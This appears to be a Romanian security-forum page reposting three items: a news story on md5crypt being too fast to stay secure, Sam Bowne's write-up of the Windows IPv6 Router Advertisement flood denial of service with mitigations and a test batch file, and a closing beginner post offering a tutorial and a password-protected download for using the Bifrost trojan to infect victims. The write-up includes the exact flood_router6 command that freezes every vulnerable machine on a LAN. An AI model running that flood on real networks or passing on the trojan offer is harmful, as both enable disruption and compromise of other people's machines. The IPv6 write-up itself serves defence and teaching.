Leaderboard

THE AUTHOR of md5crypt(), which is used to encrypt passwords on some FreeBSD and Linux-based operating systems, has said it is no longer secure despite being recommended as a password hashing function. Poul-Henning Kamp implemented Ronald Rivest's MD5 one-way hashing algorithm in his md5crypt() function that has been in use on FreeBSD and Linux-based operating systems for many years. Now Kamp has been forced to say that md5crypt() is no longer secure Md5crypt Password scrambler is no longer considered safe by author — PHKs Bikeshed after he claimed that people were still recommending it for production use. While Kamp introduced extra functionality in md5crypt() to mitigate against brute-force attacks, processing power has increased to a point where Kamp said that md5crypt() is too fast on commercially available hardware. He told The INQUIRER, "[The] only problem with md5crypt is speed: it's too fast." Kamp also told The INQUIRER that it had been known for some time that md5crypt() could no longer provide adequate protection, but since people were still recommending the use of md5crypt() in production environments that forced him to make an announcement, urging people to stop using his creation. While MD5 was cracked using brute force methods back in 2005, Kamp included extra stages in md5crypt() such as salting to increase its computational complexity, and md5crypt() remained too processor intensive for brute force attacks for a while longer. However md5crypt() is the best part of two decades old by now and more computing power, especially with GPGPUs, has meant that hackers can execute md5crypt() on every combination of 10 letters and numbers in a matter of hours. All hashing algorithms eventually become susceptible to brute-force attacks due to advances in computational power. However the fact that Kamp has been forced to make such an announcement shows that bad practices are still far too common, and that can cost people in terms of security. Sursa: Even The Author Says md5crypt() Is No Longer Secure ? Packet Storm

Pregatiti-va ca aveti mult de citit + referinte dar aveti ce invata, IPv6 vulnerabil, o vulnerabilitate atat de mare incat un atacator poate opri toate pc-urile din retea, xBox PS3, FreeBds, Win8 cu doar o pagina web .html, o prezentare foarte bine descrisa de Sam Bowne, Have Fun. Executive Summary This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally and the only way to revive it is shutting the power off--an abnormal shutdown. A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details. Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles. Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN! As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Mark Heuse* that they don't intend to patch this. Responsible Disclosure I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately. However, they informed me that this is not a new attack--it has been publicly known for months: Excellent advisory from Marc Heuse* with complete disclosure timeline: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability: Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability CVE-2010-4669 - Router Advertisements Cause DoS in Windows: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2010-4669) Mitigation There is no patch from Microsoft. But there are three four ways I know of to protect your computers: Disable IPv6. This is drastic, and will break services you may want, such as HomeGroups and DirectAccess. But it will protect you. Turn off Router Discovery -- this is a simple solution, requiring only one command, but it will prevent you from using Stateless Autoconfiguration. It's probably appropriate for servers, but not as good for client machines. Details are shown below. Use a firewall to block rogue Router Advertisements, while still allowing them from your authorized gateway. This is the most precise solution, but it is easily defeated. Details are shown below. Get a switch with RA Guard -- details here: IPv6 Security Part 2, RA Guard – Let’s get practical - Insinuator Added 5-30-2011: Marc Heuse has demonstrated some techniques to evade RA Guard with packet fragmentation: Bypassing Cisco's ICMPv6 Router Advertisement Guard feature: http://www.networksecurityarchive.org/html/FullDisclosure/2011-05/msg00446.html Packet captures of RA Guard Evasion in action: Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt - Insinuator Turning Off Router Discovery I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt): netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled I found that solution here: IPv6: stateless autoconfiguration / manual configuration Blocking Rogue Router Advertisements with Windows Firewall This method allows you to use Stateless Autoconfiguration from your authorized gateways, but block dumb rogues. However, a smart rogue could just sniff your Router Advertisement packets and spoof the authorized source address, to bypass the firewall rule. So this is a weak defense. To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page: In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the IP address starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address which matches your authorized servers, as shown below on this page: The Attack cd /pentest/spoofing/thc-ipv6 ./flood_router6 eth0 Ctrl+C Result Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C. Then with IPCONFIG you can see the effect on the target. Batch File to Test for Vulnerability On a Windows machine, run this batch file. Then run IFCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code. ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY @ECHO OFF netsh int ipv6 set addr "Local Area Connection" dead:1::1/64 netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes ping 127.0.0.1 -n 3 -w 1000 netsh int ipv6 del route dead:407::/64 "Local Area Connection" ECHO SENDING ADVERTISEMENT #1 OF 3 netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes ping 127.0.0.1 -n 3 -w 1000 netsh int ipv6 del route dead:408::/64 "Local Area Connection" ECHO SENDING ADVERTISEMENT #2 OF 3 netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes ping 127.0.0.1 -n 3 -w 1000 netsh int ipv6 del route dead:409::/64 "Local Area Connection" ECHO SENDING ADVERTISEMENT #3 OF 3 ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead:: The result on a vulnerable machine: Class Projects Here are some projects designed for use in schools and demonstrations: Win 7 DoS by RA Packets : Project 8x: Win 7 DoS by RA Packets (20 pts.) --a slower, controllable version of the attack allows you to see just how many packets are required to stop a Windows machine. Router Advertisements with scapy: Project 9x: Router Advertisements with scapy (20 pts.) -- with scapy, you can craft packets easily so you can try variations of the attack. How to perform the attack from Windows using npg: Project 11x: Rogue RA Attack with npg on Windows (10 pts.) FreeBSD is Vulnerable Too At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below (click for full-size image): The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine. So I slowed the attack down to approximately 100 RAs per second to capture this image: 100 RAs per second raised the CPU to 19.9% in my test. I filed a bug report. kern/157410: [ip6] IPv6 Router Advertisements Cause Excessive CPU Use We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu linux and Mac OS X do. I just noticed that Marc Heuse already announced that BSD was vulnerable here http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt so that is not a new discovery. (5-30-2011) Windows 8 Developer Preview is Vulnerable Too This video was made by Josival Junior--good work! Written by Sam Bowne; last modified 12 pm May 30, 2011 * On April 6 I mistakenly attributed Mark Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011. 6-17-11: Fixed anchor tag error 9-15-2011: Added Win 8 Developer Preview video Sper sa invatati ceva din asta si sa nu credeti ca IPv6 e mai sigur decat 4 si ca va revolutiona lumea, asa cum zice si articolul, companii gen Microsoft nu au de gand sa faca ceva in legatura cu asta, ba mai mult zic ca aceasta vulnerabilitate exista de luni bune. Sursa: Win 7 DoS by RA Packets

""""Tutorial pentru incepatori """" Folosirea unui trojan pas cu pas de la crearea serverului la infectarea victimei .. Program folosit (Bifrost) ,inclus in arhiva. Parola : daat FileShare Download bifrost.rar